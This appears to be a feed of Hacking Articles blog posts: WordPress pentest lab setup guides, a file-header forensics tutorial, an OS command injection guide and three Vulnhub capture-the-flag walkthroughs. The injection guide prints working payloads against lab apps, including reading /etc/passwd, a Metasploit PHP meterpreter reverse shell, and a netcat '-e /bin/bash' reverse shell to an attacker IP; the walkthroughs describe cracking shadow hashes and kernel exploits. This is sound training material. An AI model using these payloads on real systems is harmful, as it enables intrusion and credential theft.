Quantcast
Channel: Hacking Articles|Raj Chandel's Blog
Viewing all 1788 articles
Browse latest View live

WordPress Pentest Lab Setup in Multiple Ways

0
0
In this post, we will demonstrate how to set-up our own WordPress CMS for penetration testing on Ubuntu 20.04, Docker and Windows using XAMPP server.

WordPress is a free and open-source content management system (CMS) based on PHP and MYSQL. It is installed on a web server that is either part of an Internet hosting service or a network host in its own right. WordPress is reportedly the most popular website management or blogging system in use on the Web.


For more detail visit https://en.wikipedia.org/wiki/WordPress


Table of Content

Requirement


Web Server configuration

For Ubuntu 20.04


  • Apache

  • PHP

  • MySQL

  • php

For Docker in Ubuntu 20.04


·         Docker

·         Docker-composer

For XAMP server in Windows


·         XAMPP  server (32/64 bit)


Webserver Setup For Ubuntu 20.04


Install Apache

Apache is the most common web server and is easy to install on Linux. Let’s install apache by using following command

apt install apache2




Install MySQL


Next, we are going to install MariaDB server for the maintenance of our web server. MariaDB is a free  and open source fork of the MySQL RDBMS.


apt install mariadb-server mariadb-client






Now change the security by disallowing root login by entering the following command



mysql_secure_installation



First step will show an option to set the password for the root, by entering the password we enabled a root user for our database.



Second step will show an option to remove anonymous, by entering ‘y’ we have disabled all the by-default anonymous users in the server.



Third step will show the option to disallow root login remotely, by entering ‘y’ no-one can enter in the server by network.



Fourth step will show the option of removing database test, because by default MariaDB has a database by the name of test, which anyone can login into.







Install php


Now install the php php-mysql , which is the last component for the installation of the webserver. Use to access the database from the network.


Enter the following command to install the php


apt install php php-mysql




Create MySQL Database

Now, login as root user in MariaDB to create a database. After creating the database, we will create a user by which we will log in into the wordpress wp-admin.

To access the mysql, enter the following command





Install Worpdpress CMS



Now install the wordpress cms in the var/www/html to access the wordpress on localhost in any browser.

wget http://www.wordpress.org/latest.tar.gz

Now list all the files in the folder, and start extracting the .tar.gz file of wordpress.

ls

 tar –xvf latest.tar.gz



After completing the extraction of the worpress, let’s change the ownership and permissions to it.

chown -R www-data:www-data wordpress/

chmod -R 755  wordpress/

After giving the permissions to wordpress create a directory within the wp-content directory in wordpress directory which contains all the uploads for the web server.



chown wordpress/wp-content/uploads

chmod -R  www-data:www-data wordpress/wp-content/uploads




Now access the wordpress in your browser and start configuring it.

http://localhost/wordpress/



After selecting the preferred language, you’ll get a setup wizard like this



After clicking the Let’s go button, you have to fill the form to access the wp-admin.



After submitting the form, you’ll get the prompt, and press the button to run the installation to

 





After the installation, you have to fill another form in which the name and all the details of the site will have to be filled.



       

Now you have successfully completed the installation and have to login as admin so that you can access the wp-admin page of the WordPress.

                                                                                                                                               

This is how your wp-admin page look like





Open the wp-config.php file in wordpress directory and paste the following lines in it.





This is how your final page will look like

 



Wordpress Installation using Docker

Docker is an open source project to make user and system admins easier to create and deploy multiple application inside a docker container.

Install Docker

We will update the Ubuntu repository and then install the latest version of docker.io. Let’s start the installation of docker packages with the apt command as below:


apt install docker.io

                                                                                                                                      


Let’s start the Docker service by entering following command:

 systemctl start docker                                                                                                        

Install docker-compose

Docker Compose is used to run multiple containers as a single service.

Let’s begin the installation of docker-compose with the help of apt by entering following command.

apt install docker-compose

                                                                                                                                                   


After installing the composer for the Docker, we must create a directory by the name of wordpress.

After creating the directory, we will create a .yml file in the directory so that it will become a docker image.

mkdir wordpress

cd wordpress/

nano docker-compose.yml




 And now the copy pastes the following in the file





After saving the file, now let’s up the docker services and create the volume for the wordpress.

docker–compose up -d



After the doing all the configuration step-by-step, now open the browser and surf the local admin



Now open the setting bar and enter your localhost ip address with port number so that the wordpress after installation will work properly.

 




After doing all the changes, now our wordpress is ready to launch, and its home page will look like this.




For XAMP in Windows



XAMPP  is a free and open-source cross-platform web server solution stack package developed by Apache Friends, consisting mainly of the Apache HTTP ServerMariaDB database, and interpreters for scripts written in the PHP and Perl programming languages. Since most actual web server deployments use the same components as XAMPP, it makes transitioning from a local test server to a live server possible.

Let’s start the installation of XAMPP server


Download and install XAMPP on your computer



The first step to install WordPress locally is to download and install the XAMPP server. we can download the Windows installer file from Apache Friends.

You can download it from the provided link:- https://www.apachefriends.org/index.html

Once the download finishes, run the file we downloaded to install the XAMPP, during the installation we can choose which components needs to install. To install XAMPP we have to select only Apache, MySQL and php, to run the wordpress.

After the installation process is completed, we have to run the Apache and MYSQL servers in the XAMPP.



Paste extracted file of /WordPress in the /htdocs folder in /xampp folder in C-Drive.



Once you have pasted the file in the htdocs folder, now open the browser and surf for the localhost/WordPress. And create a database by the name of WordPress, in which all the user data will be stored.



After creating the database, create a username and assign a password to it to access the wp-admin page.



After following all the steps mentioned above, we have to login as the user we created and afterwards we have to setup the website credentials as shown below.



After doing all the configuration setup, our WordPress is set to launch and this is how it looks.



Forensic Investigation: Examining Corrupted File Extension

0
0

In this article, we will learn how we can Examining Corrupted File Extension to identify the basic file header in a Forensic Investigation.
Let’s Understand this with the following Scenario

In this Scenario, a forensic investigator has gone for an investigation and found out a suspicious folder where no file has any kind of file extension. Now, what will he do to proceed in his forensic investigation?



Objective: Learn to use various techniques in Forensic Investigation to analyse and examine the various file headers

·         Examining Corrupted File Extension using Windows Platform.

·         Examining Corrupted File Extension using Linux Platform.


Table of Content

Cheatsheet for Hex File Header

Examining Corrupted File Extension using Windows Platform

·         File #1: app

·         File #2: apple

·         File #3: data

·         File #4: Final

·         File #5: lecture

·         File #6: Manual

·         File #7: Notes

·         Recovered all files successfully

Examining Corrupted File Extension using Linux Platform

·         Analyze in Linux with file command

·         Analyze in Linux with a script





Cheatsheet for Hex File Header

We all know that the hex file header is used to identify any file by examine the first 4 or 5 bytes of its hexadecimal content.

We have created our very own cheat sheet to examine these values more appropriately. Which contains all the basic files extensions and its 4 to 5 bytes starter hexadecimal value along with its ASCII translation.



Examining Corrupted File Extension using Windows Platform

As per given scenario, the first thing which comes in our mind that check these files in the command prompt [cmd]. So, we checked this folder in command prompt, as we can see still, we don’t have any kind of clue about the file extensions of these files.

Now Let’s try to examine each file we found this folder and try to restore them in their original format.





File #1: app

The first file, which we got its name is app. The first thing that comes in our mind is to open this file with the help of notepad. But always remember we won't supposed to open any evidence in the forensic investigation, it can be related to acting as a crime. We are doing it to show you guys that the file is in an unreadable format.




Now, to examine these files hexadecimal values we are opening this file into a Hexadecimal editor. We can use any kind of hexadecimal editor, that can show us a hexadecimal value of any file. After opening that file, we need to examine its stating hexadecimal value to know about the file type.

So, I have used Hex Workshop which you can download from here.



After, analyzing its starting bytes with our cheat sheet. We come to know that it is an .exe filewith its ASCII translation MZ. MZ is the initials of Mark Zbikowski, he is the designer of the DOS executable file format. We have successfully investigated the first file as a .exe file.

Now, we have two methods to rename that file extension.

Method 1: With the help of the command line.

Follow this command to rename this file extension.

rename *app. *.exe


This command helps us to select only the app file to rename only this file extension. Because others are yet to be examined.



Method 2: We can simply change it directly by renaming the file name and providing it an extension which we already find above.



File #2: apple

Now, it’s time to examine the second file all we know about that file is its name apple. Straight away we opened that file in the hexadecimal editor. To start analyzing its hexadecimal values.



As we have to try to match its starting 4 bytes with our cheat sheet. We were quickly able to find out it is a .jpg file with ASCII translation ÿØÿà.

Now, just rename this file with the help of this command.

rename *apple. *.jpg


This command will only change the apple file to a .jpg file. Because others are yet to be examined.



File #3: data

Time to examine the third file which name is data. We are opening that file into a hexadecimal editor, to examine its hexadecimal values.



Now, try to match it first 4 bytes with our cheat sheet which we provide above. In a few moments, we find out that it is a .zipfile with ASCII translation PK.

Change the file name and provide it an extension with the help of rename command.

rename *data. *.zip

As we know it will only make changes in data and change it into a .zip file.



File #4: Final

Here comes the fourth file which name is Final. Now, open that file in a hexadecimal editor to analyse its hexadecimal values.



After opening that file, try to match its first seven bytes with our cheat sheet. In a few moments, we found out that its values match with a .docx file. So, it is a .docx file with ASCII translation PK.

Just change its name and provide it a .docx extension with the help of [rename] command.

rename *Final. *.docx



File #5: lecture

The fifth file named as a lecture; we try to open that file in a hexadecimal editor. To analyse its hexadecimal values, which helps us to identify its file type.



Now, try to match its first four bytes. In a moment we found out that it is a .mp3 file with an ASCII translation ID3. Just provide that file a .mp3 extension with the help of [rename] command.


rename *lecture. *.mp3



File #6: Manual

The second last file in that folder named Manual. Open that file in a hexadecimal editor to examine its hexadecimal values.



Now, try to match its four bytes with our cheat sheet. Then we come to know that it is a .pdf file with ASCII translation %PDF. Change its name and provide .pdf extension to it, with the help of rename command.


rename *Manual. *.pdf


File #7: Notes

Finally, we have reached to the file in the folder named Notes. Straight away we opened that file in a Hexadecimal editor to examine its hexadecimal values.


After opening it is saying that “It is a simple text file.”. so, we provided a .txt extension with the help of [rename] command.

rename *Notes. *.txt



Recovered all File successfully

Now, look at the folder which itself saying that we have recovered all the files successfully.


And we can also see that these files were recovered in the command prompt along with its original extension, with the help of [dir] command.


Examining Corrupted File Extension using Linux Platform



Now suppose in your investigation, you are in the same scenario where the file extension is missing but this time the Victim machine operates on Linux Environment and you are not allow to copy this folder on other machine. Then How would you handler this situation?


Analysis using File command


The file command is Linux utility that analyzes each argument in an attempt to classify it. Hence, we can examine this forensic investigation in a Linux environment with the help of file command.

We are using the [ls] command to show you guys, these are the same files and the same scenario that we already explained above.



We just need to use [file] along with the file name, to know about the originality of that file. Pick the first file and use this command. It shows that it is an MS Windows executable file.


File app


Let us try the same technique with the second file named apple. Apply [file] command and provide its file name. It shows that it is a jpeg image along with its internal pieces of information.


File apple



Analyze using script

If we aren’t able to apply the [file] command again and again, in Linux we can also create a special script for that. Which tells us about all files in a single click. We named that script as script.sh.

We write this script to do these things for us.

for name in $(ls $1)

do

    file $name

done



After writing that script, we need to give this permission to read, write, and execute. With the help of chmod.


chmod 777 script.sh


After giving the permissions, we just need to execute our script to reveal the real identity of each file in this folder.


./script.sh


Now we can see that we successfully investigated every file in the folder and revealed their real identity in this forensic investigation scenario.



This article will help us to identify the true identity of a file during a Forensic Investigation in both the Windows and Linux environments.


Author: Shubham Sharma is a Pentester and Cybersecurity Researcher, Contact Linkedin and twitter.



Comprehensive Guide to OS Command Injection

0
0

Isn’t it great if you get the privilege to run any system commands directly on the target’s server through its hosted web-application? Or you can get the reverse shell with some simple clicks? In this article we’ll learn about OS Command Injection, in which an attacker is able to trigger some arbitrary system shell commands on the hosted operating system via a vulnerable web-application.


Table of Content

·        Introduction to Command Injection

·        How Command Injection Occurs?

·        Metacharacters

·        Types of Command Injection

·        Impact of OS Command Injection

·        Steps to exploit – OS Command Injection

·        Manual Exploitation

o   Basic OS Command injection

o   Bypass a Blacklist implemented

·        Exploitation through Automated tools

o   Burp Suite

§  Manual

§  Fuzzing

o   Commix

o   Metasploit

·        Blind OS Command Injection

o   Detection

o   Exploitation

·        Mitigation – OS Command Injection



Introduction

Command Injection also referred as Shell Injection or OS Injection. It arises when an attacker tries to perform system level commands directly through a vulnerable application in order to retrieve information of the web server or try to make unauthorized access into the server. Such an attack is possible only when the user-supplied data is not properly validated before passing to the server. This user data could be in any form such as forms, cookies, HTTP headers, etc.



How Command Injection Occurs?

There are many situations when the developers tries to include some functionalities into their web application by making the use the operating system commands. However, if the application passes the user-supplied input directly to the server without any validation, thus the application might become vulnerable to command injection attacks.


In order to clear the vision, let’s consider this scenario:

Think for a web-application providing a functionality that any user can ping any particular IP address through his web-interface in order to confirm the host connection, which means that the application is passing the pingcommand with that particular input IP directly to the server.



Now if an attacker injects an unwanted system command adding up with the basic ping command using some metacharacters. Thus the web-application pass it all to the server directly for execution, allowing the attacker to gain the complete access of the operating system, start or stop a particular service, view or delete any system file and even captures a remote shell.




Metacharacters

Metacharacters are the symbolic operators which are used to separate the actual commands from the unwanted system commands. The semicolon (;) and the ampercent (&) are majorly used as separators that divides the authentic input command and the command that we are trying to inject.

The commonly used metacharacters are:




Types of Command Injection

Error based injection: When an attacker injects a command through an input parameter and the output of that command is displayed on the certain web page, it proves that the application is vulnerable to the command injection. The displayed result might be in the form of an error or the actual outcomes of the command that you tried to run. An attacker then modifies and adds additional commands depending on the shell the web server and assembles information from the application.


Blind based Injection: The results of the commands that you inject will not be displayed to the attacker and no error messages are returned. The attacker might use another technique to identify whether the command was really executed on the server or not.


The OS Command Injection vulnerability is one of the top 10 OWASP vulnerabilities. Therefore let’s have a look onto its impact.


Impact of OS Command Injection


OS command injection is one of the most powerful vulnerability with “High Severity having a CVSS Score of 8”.

Thus this injection is reported under:

1.       CWE-77: Improper Neutralization of Special Elements used in a Command.

2.       CWE-78: Improper Neutralization of Special Elements used in an OS Command.


Wonder how to exploit this vulnerability? Let’s check out its steps:


Steps to exploit – OS Command Injection


Step 1: Identify the input field

Step 2: Understand the functionality

Step 3: Try the Ping method time delay

Step 4: Use various operators to exploit OS Command Injection


So I guess until now you might be having a clear vision with the concept of OS command injection and its methodology. But before making our hands wet with the attacks let’s clear one more thing i.e.


Command Injection differs from Code Injection”, in that code injection allows the attacker to add their own code that is then executed by the application. In Command Injection, the attacker extends the default functionality of the application, which execute system commands, without the necessity of injecting code. Source:

https://www.owasp.org/index.php/Command_Injection


Let’s Start!!


Basic OS Command injection

I’ve opened the target IP in my browser and logged in into DVWA as admin : password, from the DVWA security option I’ve set the security level to low. Now I’ve opted for the Command Injection vulnerability present on the left hand side of the window.


I’ve been presented with a form which is suffering from OS command injection vulnerability asking to “Enter an IP address:”.

From the below image you can see that, I’ve tried to ping its localhost by typing 127.0.0.1, and therefore I got the output result.



In order to perform the “Basic OS Command Injection attack”, I’ve used the “; (semicolon) as a metacharacter and entered another arbitary command i.e. “ls”


127.0.0.1;ls



From the below image you can see that the “;” metacharacter did its work, and we are able to list the contents of the directory where application actually is. Similarlly we can run the other system commands such as “;pwd”, “;id” etc.



Bypass a Blacklist implemented

Many times the developers sets up a blacklist of the commonly used metacharacters i.e. of  “&” ,“;” ,”&&” ,“||” , “#” and the other ones to protect their web-applications from the command injection vulnerabilities.

Therefore in order to bypass this blacklist, we need to try all the different metacharacters that the developer forgot to add.

I’ve increased up the security level to high and tried up with all the different combinations of metacharacters.


From the above image you can see that I’ve successfully captured the password file by using the metacharacter “|”

127.0.0.1 |cat /etc/passwd





Command Injection using BurpSuite


Burpsuite is considered as one of the best and the most powerful tool for web-penetration testing. So we’ll try to deface the web-application through it.

I’ve now logged in into bWAPP with bee : bug by running up the target’s IP into the browser,and have even set the security level to medium and “Chooseyour bug” option to “OS Command Injection”.



Let’s try to enumerate this “DNS lookup”form by clicking on the Lookup button and simply capturing the browser’s request in the proxy tab and sending the same to the Repeater.



Now I just need to manipulate the target by adding up some system commands i.e. “pwdwith the help of metacharacters.

In this I’ve used “|” as the delimiter, you can choose yours.

As soon as I click on the Go tab, the response starts generating and on the right hand side of the window you can see that I’ve captured the working directory.





Fuzzing


In the last scenario while bypassing the implemented blacklist, we were lucky that the developer had created and setup the list with the limited combination of metacharacters. But still it took time, to check for every possible combination of the metacharacters. And therefore it is obvious that this metacharacter would not work with every web-application, thus in order bypass these differently generated blacklists, we’ll be doing a fuzzing attack.


Let’s check it out how!!


I’ve created a dictionary with all the possible combinations of the metacharacters and now will simply include it into my attack.


Tune in you burp suite and start intercepting the request, as soon as you capturethe ongoing request send the same to the intruder by simply doing a right click on the proxy tab and choose the option to send to intruder.



Now we’ll setup the attack position by simply shifting the current tab to the Positions tab, and selecting the area where we want to make the attack happen with the ADD button.




Time to inject our dictionary, now move to the Payload tab, and click on the load button in order to load our dictionary file.




As soon as I fire up the Start Attack button, a new window will pop up with the fuzzing attack.


From the below screenshot, it’s clear that our attack has been started and there is a fluctuation in the length section. I’ve doubled clicked on the length field in order to get the highest value first.



From the below image, you can see that as soon as I clicked over the 11thRequest, I was able to detect the lscommand running in the response tab.




OS Command Injection using Commix


Sometimes fuzzing consumes a lot of time, and even it becomes somewhat frustrating while performing a command injection attack over it i.e. wait for the incremented length and check for every possible response it drops.

In order to make our attack simpler and faster we’ll be using a python scripted automated tool “Commix”, which makes it very easy to find the command injection vulnerability and then helps us to exploit it. You can learn more about Commix from here.


So let’s try to drop down the web-application again by getting a commix session in our kali machine.

From the below image you can see that I’ve set the security level to high and opted the “Choose your bug”option to “OS Command Injection”.



Commix works on cookies. Thus in order to get them, I’ll be capturing the browser’s requestinto my burpsuite, by simply enabling the proxy and the intercept options, further as I hit up the Lookup button, I’ll be presented with the details in to the burpsuite’s Proxy tab.



Fire up you Kali Terminal with commix and run the following command with the Referer, Cookie, and target values:


commix --url="http://192.168.0.11/bWAPP/commandi.php" --cookie="security_level=2; PHPSESSID=cc91040cc70b9abdb2fdc637527bf132" --data="target=www.nsa.gov&form=submit"


Type ‘y’ to resume the classic injection point and to pseudo terminal shell.



Great!! We’re into our target’s machine.


What if we could convert this commix shell into a meterpreter one?

As soon as we capture the commix session, we’ll try to generate a reverse meterpreter session of the target machine by executing the following commands:


reverse_tcp

set lhost 192.168.0.9

set lport 4444


As we hit enter, it will ask us to choose whether we want a netcat shell or some other (meterpreter) one. Choose the option 2 and hit enter again.

Now you’ll be popped up with a new list of sessions asking for which meterpreter session you want as in whether you want it to be PHP, Windows, python etc.As our target server is running over the PHP framework, we will select option 8 i.e. a PHP meterpreter reverse shell.



When everything is done, it will provide us a resource file with an execution command. Open a new terminal window and type the presented command there, as in our case it generated the following command:


msfconsole-r/usr/share/commix/php_meterpreter.rc

Cool!! It’s great to see that our commix session is now having some new wings.




OS Command Injection using Metasploit

Why to drive so long in order to get a meterpreter session, if we can just gain it directly through the metasploit framework.

Let’s check it out how

Boot the metasploit framework into your kali terminal by running up the simple command “msfconsole”.

There are many different ways that provide us our intended outcome, but we will use the web_delivery exploit in order to find a way to transfer our malicious payload into the remote machine.


Type the following commands to generate our payload:


use exploit/multi/script/web_delivery


Now it’s time to choose our target.

Type “show targets” in order to get the complete list of all the in-built target options.


set target 1

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.9

set lport 2222

exploit


As soon as I hit enter after typing exploit, the metasplot framework will generate the payload with all the essentials.



We are almost done, just simply include this payload with the command using any metacharacter.

Here I’ve used & (ampercent) so that the server executes both the commands one after the another.



From the below image you can see that we are into the target’s system again, but this time we are more powerful with the metasploit session.



Blind OS Command Injection

So until now, we were lucky enough that the web-applications were returning the outputs from the commands directly on the screen through their HTTP Responses.

But there are many situations, when the applications do not return anything and still run some system commands as into their backend processes.

So the question arises - Do such web-applications are vulnerable to command injection??

Let’s try to figure this out by using the most reliable method the time-delay ping command which will detect whether the application is suffering from command injection or not.


Detection of Blind OS Command Injection


I’ve now logged in inside bWAPP and selected the “Choose you bug” option to “OS Command Injection - Blind”, further setting up the security level to medium.

Thus I’ve been redirected to the web-application which is suffering from command injection vulnerability.

Let’s check, whether this application is actually suffering from the OS Command Injection or not.

Enter any IP address in the field provided and turn on your burpsuite monitor in order to capture the ongoing http request, thus forwarding it all into the repeater tab.



Now we’ll try to manipulate the request with

ping –c 10 192.168.0.9


As I clicked over the Go tab, it took about 10 seconds to display the response result, thus confirms up that this web-application is suffering from OS Command Injection.



Exploiting Blind OS Command Injection using Netcat


As of now we are confirmed that the application which we are trying to surf is suffering from command injection vulnerability. Let’s try to trigger out this web-application by generating a reverse shell using netcat.

From the below image you can see that I’ve checked my Kali machine’s IP address and setup the netcat listener at port number 2000 using


nc –lvp 2000

where l = listen, v = verbose mode and p = port.



Now on the web application, I’ve injected my netcat system command with the localhost command into the input field i.e.


localhost|nc 192.168.0.9 –e /bin/bash


The –e /bin/bashempowers the netcat command to execute a bash shell on the listener machine.






Great!! We are into the victim’s shell though our kali machine and we’re now able to run any system command from here.



Mitigation – OS Command Injection


1.       The developers should setup some strong server-side validated codes and implement a set of whitelist commands, which only accepts the alphabets and the digits rather than the characters.

You can check this all out from the following code snippet, which can protect the web-applications from exposing to the command injection vulnerabilities.




2.       Avoid the applications from calling out directly the OS system commands, if needed the developers can use the build-in API’s for interacting with the Operating System.

3.       The developers should even ensure that the application must be running under least privileges

eLection: 1 Vulnhub Walkthorugh

0
0

Today we are going to solve another boot2root challenge called "eLection: 1". It's available at Vulnhub for penetration testing. This is a mid-level lab based on the CMS "eLection". There are several methods (easy and medium) to access the server.  The merit of doing this lab is Love's. Let's start and learn how to successfully break it down.

Level: Medium

Since these labs are available on the Vulnhub website. Let's download the lab file from here.


Penetration Testing Methodology

Reconnaissance

·         Netdiscover

·         Nmap

Enumeration

·         Gobuster

·         Dirsearch

·         uDork

Exploiting

·         Sqlmap

·         System log file

Privilege Escalation

·         Abuse SETUID Binary

Capture the flag


Walkthrough


Reconnaissance


As always we identify the host's IP with the "Netdiscover" tool:




So, let's start by listing all the TCP ports with nmap.

$ nmap –sV -sC 192.168.10.181 -p-




Enumeration


We access the IP address of the web service and saw that Apache default page is displayed.




It's time to take out Gobusterand fuzzy directories with the "common.txt" dictionary (it comes pre-installed in Kali).




We found the directory “/phpmyadmin/” and a file robots.txtWe access the robots.txt and find the path to a CMS voting system called "eLection".



We have found that access to this website is indeed accessible.




Exploitation (WITHOUT exploiting eLection was easier, but less  of fun). We use the "dirsearch" tool and merge files and directories into the path "/election/".





Thanks to a careless system administrator, the directory "/logs/" is listed and we can obtain the SSH credentials of the user "Love".







We use in the SSH service that the credentials of the user "Love" and read the flag of "user.txt"




Going further for more exploitation


In the administrator section, you will be asked for your administrator ID and password. We do not know both, it is ruled out to make brute force, since the system only allows you 5 attempts. So let’s  look for more options.




Remember, in the reconnaissance phase we found a "PhpMyAdmin" panel.





We try with default passwords (guessing) and support the credentials "root:toor".


We access the "eLection" database and the "tb_panitia" table, there we find the ID and the hashed password.




To get the password, we can use Google by searching for the hash.I will use my "uDork (Google Hacking Tool)".




We visit the URL that uDork has taken from us and get the password in plain.




We go back to the "eLection" administrator panel and use the ID "1234" and the password "Zxc123!@#".


We list the version of "eLection"v.2.0, so we will look for possible exploits that can be used to escalate privileges in the system.




We found the following exploit that requires the use of credentials, this exploit will allow us to execute remote code from an "os-shell" with the tool "sqlmap".




We followed the steps of the exploitation and run sqlmap.





If everything went well, we'll get an os-shell where we can keep playing.  We execute these two sequences and we will get the file "system.log" with the SSH credentials.




We use in the SSH service the credentials of the user "Love" and read the flag of "user.txt"





Privilege Escalation (root)


We executed the following command to check the binaries we have access to. We found a rare binary, look for exploits related to it and found this exploit.




We downloaded the exploit into the victim’s machine, compile it and run it. We get root access and read the flag!




Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks

Contacted on LinkedInand Twitter.


Sunset: decoy Vulnhub Walkthrough

0
0

Today we are going to solve another boot2root challenge called "Sunset: decoy".  It's available at Vulnhub for penetration testing. This is an easy to intermediate level lab.

The credit for making this lab goes to whitecr0wz. Let's start and learn how to break it down successfully.


Level: Easy/Intermediate


Since these labs are available on the Vulnhub website. Let's download the lab file from here.


Penetration Testing Methodology

Reconnaissance

·         Netdiscover

·         Nmap

Enumeration

·         Web server backup

Exploiting

·         Zip2john & John The Ripper

Privilege Escalation

·         Pspy64

·         Chrontab abuse and chkrootkit vulnerability

Capture the flag


Walkthrough


Reconnaissance


As always we identify the host's IP with the "Netdiscover" tool:





To work more comfortably, I'll put the IP address in /etc/hosts.




So, let's start by listing all the TCP ports with nmap.

$ nmap –sV -sC -p- 192.168.10.186




Enumeration


We access the web service and download the file "save.zip".




We tried to unzip the file, but it's password protected.



For this mission we will use "zip2john" which will help us to extract the hash from the .zip file and later we will attack it with "John The Ripper" and the dictionary "rockyou.txt".


We will obtain the password "manuel" and use it to decompress the file, this time with success.

 

 



Exploiting


In the content of the .zip, we found a backup of several system files. We read the "shadow" file, copy the two hashes into a file called "users.hash" and crack this one with John The Ripperand the "rockyou.txt" dictionary.




We connect through the SSH service, this time we will add -t "bash --noprofile" to escape from the restricted bash.

In there, we will read the user flag.





Privilege Escalation (root)

We listed the files and found a binary called "honeypot.decoy". We run it, use option 5 and see a warning that it will run in a minute.




It is time to run pspy64, we check that a binary is running as root every 60 seconds.




We looked for information about the version of this binary and found an exploit that allows to scale privileges as root.




Simply create a file called "update" and insert a reverse shell. We will give it execution permissions and wait 60 seconds with a netcat listening on port 4444 in our Kali.




After some time, we will have a session as root and we will be able to read the flag.




Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks

Contacted on LinkedInand Twitter.

CyberSploit: 1 Vulnhub Walkthrough

0
0

Today we are going to solve another boot2root challenge called "CyberSploit: 1".  It's available at Vulnhub for penetration testing. This is an easy level lab.  The credit for making this lab goes to cybersploit1. Let's get started and learn how to successfully break it down.Level: Easy

Since these labs are available on the Vulnhub website. Let's download the lab file from here.


Penetration Testing Methodology

Reconnaissance

·         Netdiscover

·         Nmap

Enumeration

·         Gobuster

Exploiting

·         Basic Cryptography

·         CyberChef

Privilege Escalation

·         Local Privilege Escalation ‘Overlays’

·         Capture the flag


Walkthrough


Reconnaissance


As always we identify the host's IP with the "Netdiscover" tool:


$ netdiscover




So, let's start by listing all the TCP ports with nmap.

$ nmap –sV -sC -p- 192.168.10.190




To work more comfortably, I'll put the IP address in /etc/hosts.



Enumeration


We access the web service and review the source code. We find the SSH user name.




It's time to fuzzing! We used Gobuster and found several files. We examined the robots.txt and found a base64text.



Exploiting

We use curl and add "base64 -d" to the command to decode the message in plain text. We get the first flag, the flag is the user's password "itsskv".





We access with the obtained credentials and read the file "flag2.txt". Inside, we find a new code, this time it's "binary code".




We use the online tool "Cyberchef" and we get the second flag.





Privilege Escalation (root)


The root is quite simple (as the creator of the machine said it was easy level). The machine has a kernel vulnerable to "overlayfs: Local Privilege Escalation".


We download the exploit, compile it on the victim machine and run it.

We get a root prompt and read our flag.



Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks

Contacted on LinkedInand Twitter.

WordPress Pentest Lab Setup in Multiple Ways

0
0

WordPress Pentest Lab Setup in Multiple Ways


In this post, we will demonstrate how to set-up our own Vulnerable WordPress CMS for penetration testing on Ubuntu 20.04, Docker and Windows using XAMPP server.  

Table of Content

·         For Ubuntu 20.04

·         For Docker in Ubuntu 20.04

·         For XAMP server in Windows

WordPress Setup in Ubuntu 20.04


In order to configure Wordpress in your Ubuntu platform, there are some prerequisites before we install the CMS.

Prerequisites for wordPress

Apache

Database (MySQL/Mariadb)

PHP


Install Apache

To Start HTTP service with the help of Apache thus, using privilege account (as root) execute the following command in the terminal.

apt install apache2



Install MySQL


For run WordPress, you will also need a database server. The database server is where WordPress content is saved. So, we are going choose MariaDB-server as the required database for Wordpress and execute the following command

apt install mariadb-server mariadb-client




Next, execute the following commands to protect remote root login for the database server.

mysql_secure_installation


Then respond to questions asked after the command has been executed.


§  Enter current password for root (enter for none): press the Enter

§  Set root password? [Y/n]: Y

§  New password: Enter password

§  Re-enter new password: Repeat password

§  Remove anonymous users? [Y/n]: Y

§  Disallow root login remotely? [Y/n]: Y

§  Remove test database and access to it? [Y/n]:  Y

§  Reload privilege tables now? [Y/n]:  Y





Install php


And at last install the php php-mysql  and run the following command to install these application.


apt install php php-mysql




Create Database for WordPress



To access the mysql, enter the following command

mysql –u root –p

CREATE DATABASE wordpress;

CREATE USER ‘wp_user’@’localhost’ IDENTIFIED BY ‘password’;

GRANT ALL ON wordpress.* TO 'wp_user'@'localhost' IDENTIFIED BY 'password';

FLUSH PRIVILEGES;

exit;





WordPress Installation & Configuration

Now, its time to download and install the WordpPress on our localhost, with the help of wget we have fetched the compressed file of wordpress setup and extract the folder inside /var/www/html directory.

cd /var/www/html

wget http://www.wordpress.org/latest.tar.gz

tar –xvf latest.tar.gz




Then run the given command to change ownership of ‘wordpress’ directory as well permission for upload directory.

chown -R www-data:www-data wordpress/

chmod -R 755  wordpress/

mkdir  wordpress/wp-content/uploads

chmod -R  www-data:www-data wordpress/wp-content/uploads



Now, till here we are done with installation, to configure WordPress we need to access the application over web browser on localhost by executing following.

http://localhost/wordpress/

This will open the setup file and ask to choose your preferred language. I select English and then press the continue Tab.


Read the given content and press Let’s go to continue the activity.



To continue the activity, we need to enter the required details that will help the application to connect with database, thus it should be the same information that we have entered above at the time of database was created for WordPress.



And if your above given detail is correct, you get the Installation page as we have here.



Now after that, it will ask you enter details for your Website which you want to host using WordPress CMS as shown in the below and then finally click on install Tab.

Note: The User and Password asked before the installation is referred to your Database information, and the username and password asked after installed is referred to your application (CMS).



And once it is done, you get application login page where you have to enter credential to access the dashboard of your CMS.


You get the dashboard where you can write your content that to be posted on the website.



Open the wp-config.php file in wordpress directory and paste the following lines in it to access the website page.

define(‘ WP_SITEURL ‘, ‘http://’ .S_SERVER[‘HTTP_HOST’].’/wordpress’);

define(‘ WP_HOME ‘, ‘http://’ .S_SERVER[‘HTTP_HOST’].’/wordpress’);




And Finally, it is over here, and your WordPress is completely ready to go😊.



Install WordPress using Docker


Install WordPress through will release your effort of installing prerequisites for WordPress setup. I very easy and quick technique to configured WordPress. All you need to have some basic knowledge of Docker and its functionalities.

To install wordpress using docker, first we will update the Ubuntu repository and then install the latest version of docker.io. Let’s start the installation of docker packages with the apt command as below:


apt install docker.io



Docker Compose is used to run multiple containers as a single service. Let’s begin the installation of docker-compose with the help of apt by entering following command.

apt install docker-compose



After installing the composer for the Docker, we must create a directory by the name of wordpress.

After creating the directory, we will create a .yml file that will contain the service definitions for your setup.

mkdir wordpress

cd wordpress/

nano docker-compose.yml



Now Paste the following text in the .yml and the configuration.

version: '3.3'


services:

   db:

     image: mysql:5.7

     volumes:

       - db_data:/var/lib/mysql

     restart: always

     environment:

       MYSQL_ROOT_PASSWORD: somewordpress

       MYSQL_DATABASE: wordpress

       MYSQL_USER: wordpress

       MYSQL_PASSWORD: wordpress


   wordpress:

     depends_on:

       - db

     image: wordpress:latest

     ports:

       - "8000:80"

     restart: always

     environment:

       WORDPRESS_DB_HOST: db:3306

       WORDPRESS_DB_USER: wordpress

       WORDPRESS_DB_PASSWORD: wordpress

       WORDPRESS_DB_NAME: wordpress

